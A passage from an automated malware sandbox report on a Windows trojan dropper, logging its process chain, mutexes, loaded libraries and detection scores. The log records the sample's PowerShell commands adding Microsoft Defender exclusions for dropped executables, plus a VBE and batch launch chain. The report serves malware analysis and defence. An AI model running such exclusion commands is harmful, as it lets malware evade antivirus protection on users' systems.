                                    Source: powershell.exe, 00000008.00000002.3164480126.000001A4A8454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2576914126.0000019EC3E85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3172837605.00000282BE124000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.3114516245.000001C490075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3150761843.0000021864275000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                                    System Summary

                                    barindex
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007D6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_007D6FAA
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007D848E0_2_007D848E
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007D40FE0_2_007D40FE
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007E00B70_2_007E00B7
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007E40880_2_007E4088
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007E71530_2_007E7153
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007F51C90_2_007F51C9
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007D32F70_2_007D32F7
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007E62CA0_2_007E62CA
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007E43BF0_2_007E43BF
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007DF4610_2_007DF461
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007FD4400_2_007FD440
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007DC4260_2_007DC426
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007E77EF0_2_007E77EF
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007D286B0_2_007D286B
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007FD8EE0_2_007FD8EE
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_008019F40_2_008019F4
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007DE9B70_2_007DE9B7
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007E6CDC0_2_007E6CDC
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007E3E0B0_2_007E3E0B
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007DEFE20_2_007DEFE2
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007F4F9A0_2_007F4F9A
                                    Source: C:\SavesHost\Blockbrowser.exeCode function: 5_2_00007FF848D00D485_2_00007FF848D00D48
                                    Source: C:\SavesHost\Blockbrowser.exeCode function: 5_2_00007FF848D00E435_2_00007FF848D00E43
                                    Source: C:\SavesHost\Blockbrowser.exeCode function: 5_2_00007FF8490C195F5_2_00007FF8490C195F
                                    Source: C:\SavesHost\Blockbrowser.exeCode function: 5_2_00007FF84939700E5_2_00007FF84939700E
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848DC30E98_2_00007FF848DC30E9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF848DB33349_2_00007FF848DB3334
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848DC30E911_2_00007FF848DC30E9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848DB30E913_2_00007FF848DB30E9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FF848DA2E1117_2_00007FF848DA2E11
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeCode function: 25_2_00007FF848CD0D4825_2_00007FF848CD0D48
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeCode function: 25_2_00007FF848CD0E4325_2_00007FF848CD0E43
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeCode function: 25_2_00007FF84909195F25_2_00007FF84909195F
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeCode function: 25_2_00007FF849368CD225_2_00007FF849368CD2
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeCode function: 25_2_00007FF849367F2625_2_00007FF849367F26
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeCode function: 25_2_00007FF84937119525_2_00007FF849371195
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\IxKHLBgB.log 4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: String function: 007EEB78 appears 39 times
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: String function: 007EEC50 appears 56 times
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: String function: 007EF5F0 appears 31 times
                                    Source: Ccp3sJPDXs.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@37/77@1/1
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007D6C74 GetLastError,FormatMessageW,0_2_007D6C74
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007EA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_007EA6C2
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Program Files (x86)\windows media player\C1lzS0DukHxxFP1s.exeJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\lgJkAMCv.logJump to behavior
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1848:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-3OxsSTgLxBT4yfXwdLEr
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\AppData\Local\Temp\NNx7jhjWq4Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\SavesHost\5QThzOH4GoufqMvWEaCGmEpHUrBKeNi1rE7wtsMJtk.bat" "
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCommand line argument: sfxname0_2_007EDF1E
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCommand line argument: sfxstime0_2_007EDF1E
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCommand line argument: STARTDLG0_2_007EDF1E
                                    Source: Ccp3sJPDXs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: Ccp3sJPDXs.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: Ccp3sJPDXs.exeVirustotal: Detection: 76%
                                    Source: Ccp3sJPDXs.exeReversingLabs: Detection: 68%
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeFile read: C:\Users\user\Desktop\Ccp3sJPDXs.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\Ccp3sJPDXs.exe "C:\Users\user\Desktop\Ccp3sJPDXs.exe"
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\SavesHost\6kXFj.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\SavesHost\5QThzOH4GoufqMvWEaCGmEpHUrBKeNi1rE7wtsMJtk.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\SavesHost\Blockbrowser.exe "C:\SavesHost/Blockbrowser.exe"
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe'
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows media player\C1lzS0DukHxxFP1s.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\SgrmBroker.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\0ZuAkTjxKX.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\ZI0Zcb1pDT.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\Blockbrowser.exe'
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\equVSDMYPr.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe "C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe"
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\SavesHost\6kXFj.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\SavesHost\5QThzOH4GoufqMvWEaCGmEpHUrBKeNi1rE7wtsMJtk.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\SavesHost\Blockbrowser.exe "C:\SavesHost/Blockbrowser.exe"Jump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe'Jump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows media player\C1lzS0DukHxxFP1s.exe'Jump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\SgrmBroker.exe'Jump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\0ZuAkTjxKX.exe'Jump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\ZI0Zcb1pDT.exe'Jump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\Blockbrowser.exe'Jump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\equVSDMYPr.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe "C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe"
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: version.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
